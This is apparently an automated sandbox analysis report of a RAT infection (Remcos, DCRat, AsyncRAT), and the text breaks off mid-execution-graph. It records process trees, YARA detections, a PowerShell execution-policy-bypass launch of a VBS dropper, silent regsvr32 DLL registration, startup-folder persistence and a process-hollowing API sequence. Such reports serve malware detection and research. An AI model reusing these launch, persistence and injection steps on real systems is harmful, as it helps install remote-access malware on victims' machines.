                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.3316092029.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.3309788726.0000000003118000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.3309788726.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.3306976580.00000000010A1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:5
                                  Start time:17:03:58
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:17:03:59
                                  Start date:24/04/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Imagebase:0xd30000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000006.00000002.2078678717.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:7
                                  Start time:17:03:59
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:8
                                  Start time:17:03:59
                                  Start date:24/04/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Imagebase:0xe10000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000008.00000002.2081271482.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000008.00000002.2085488605.0000000005756000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000008.00000002.2081271482.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:9
                                  Start time:17:03:59
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:10
                                  Start time:17:04:00
                                  Start date:24/04/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Imagebase:0xac0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000000A.00000002.2085289507.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000000A.00000002.2085289507.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:12
                                  Start time:17:04:15
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exit
                                  Imagebase:0x790000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:13
                                  Start time:17:04:15
                                  Start date:24/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:14
                                  Start time:17:04:15
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
                                  Imagebase:0x520000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:15
                                  Start time:17:04:16
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\wscript.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs"
                                  Imagebase:0x3b0000
                                  File size:147'456 bytes
                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:16
                                  Start time:17:04:21
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:17
                                  Start time:17:04:22
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.3307138781.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:false

                                  General

                                  Target ID:18
                                  Start time:17:04:22
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:19
                                  Start time:17:04:24
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  General

                                  Target ID:20
                                  Start time:17:04:24
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:21
                                  Start time:17:04:25
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.2306410441.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  General

                                  Target ID:22
                                  Start time:17:04:25
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:23
                                  Start time:17:04:26
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.2318995170.0000000003537000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  General

                                  Target ID:24
                                  Start time:17:04:26
                                  Start date:24/04/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
                                  Imagebase:0x7ff69b660000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:25
                                  Start time:17:04:31
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\wscript.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
                                  Imagebase:0x3b0000
                                  File size:147'456 bytes
                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:26
                                  Start time:17:04:36
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:27
                                  Start time:17:04:37
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2427511925.0000000002B17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:28
                                  Start time:17:04:37
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:29
                                  Start time:17:04:38
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.2441743999.00000000029F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  General

                                  Target ID:30
                                  Start time:17:04:38
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:31
                                  Start time:17:04:39
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.2453487662.0000000003017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  General

                                  Target ID:32
                                  Start time:17:04:40
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:33
                                  Start time:17:04:41
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.2465197293.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:87.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:96%
                                    Total number of Nodes:99
                                    Total number of Limit Nodes:0
                                    execution_graph 1805 5660000 1838 5660054 1805->1838 1807 5660006 1870 5660420 1807->1870 1809 5660083 1810 5660420 VirtualAlloc 1809->1810 1811 566008f 1810->1811 1812 5660420 VirtualAlloc 1811->1812 1813 5660098 1812->1813 1814 5660420 VirtualAlloc 1813->1814 1815 56600a1 1814->1815 1816 5660420 VirtualAlloc 1815->1816 1817 56600aa 1816->1817 1818 5660420 VirtualAlloc 1817->1818 1819 56600b6 1818->1819 1820 5660155 CreateProcessW 1819->1820 1821 5660170 1820->1821 1822 566018b NtUnmapViewOfSection 1821->1822 1823 566019b 1822->1823 1824 56601b8 VirtualAllocEx 1823->1824 1825 56601d2 1824->1825 1826 5660214 WriteProcessMemory 1825->1826 1827 5660220 1826->1827 1828 56602fa WriteProcessMemory 1827->1828 1829 566031e 1827->1829 1828->1827 1830 566034f Wow64GetThreadContext 1829->1830 1831 566035e 1830->1831 1832 566039e WriteProcessMemory 1831->1832 1833 56603aa 1832->1833 1834 56603e5 Wow64SetThreadContext 1833->1834 1835 56603f5 1834->1835 1836 5660407 ResumeThread 1835->1836 1837 5660415 1836->1837 1839 566005e 1838->1839 1840 5660420 VirtualAlloc 1839->1840 1841 5660083 1840->1841 1842 5660420 VirtualAlloc 1841->1842 1843 566008f 1842->1843 1844 5660420 VirtualAlloc 1843->1844 1845 5660098 1844->1845 1846 5660420 VirtualAlloc 1845->1846 1847 56600a1 1846->1847 1848 5660420 VirtualAlloc 1847->1848 1849 56600aa 1848->1849 1850 5660420 VirtualAlloc 1849->1850 1851 56600b6 1850->1851 1852 5660155 CreateProcessW 1851->1852 1853 5660170 1852->1853 1854 566018b NtUnmapViewOfSection 1853->1854 1855 566019b 1854->1855 1856 56601b8 VirtualAllocEx 1855->1856 1857 56601d2 1856->1857 1858 5660214 WriteProcessMemory 1857->1858 1859 5660220 1858->1859 1860 56602fa WriteProcessMemory 1859->1860 1861 566031e 1859->1861 1860->1859 1862 566034f Wow64GetThreadContext 1861->1862 1863 566035e 1862->1863 1864 566039e WriteProcessMemory 1863->1864 1865 56603aa 1864->1865 1866 56603e5 Wow64SetThreadContext 1865->1866 1867 56603f5 1866->1867 1868 5660407 ResumeThread 1867->1868 1869 5660415 1868->1869 1869->1807 1871 5660427 1870->1871 1872 5660432 VirtualAlloc 1871->1872 1873 566044a 1872->1873 1873->1809 1943 5e3003c 1944 5e3005e 1943->1944 1945 5e30420 VirtualAlloc 1944->1945 1946 5e30083 1945->1946 1947 5e30420 VirtualAlloc 1946->1947 1948 5e3008f 1947->1948 1949 5e30420 VirtualAlloc 1948->1949 1950 5e30098 1949->1950 1951 5e30420 VirtualAlloc 1950->1951 1952 5e300a1 1951->1952 1953 5e30420 VirtualAlloc 1952->1953 1954 5e300aa 1953->1954 1955 5e30420 VirtualAlloc 1954->1955 1956 5e300b6 1955->1956 1957 5e30155 CreateProcessW 1956->1957 1958 5e30170 1957->1958 1959 5e3018b NtUnmapViewOfSection 1958->1959 1960 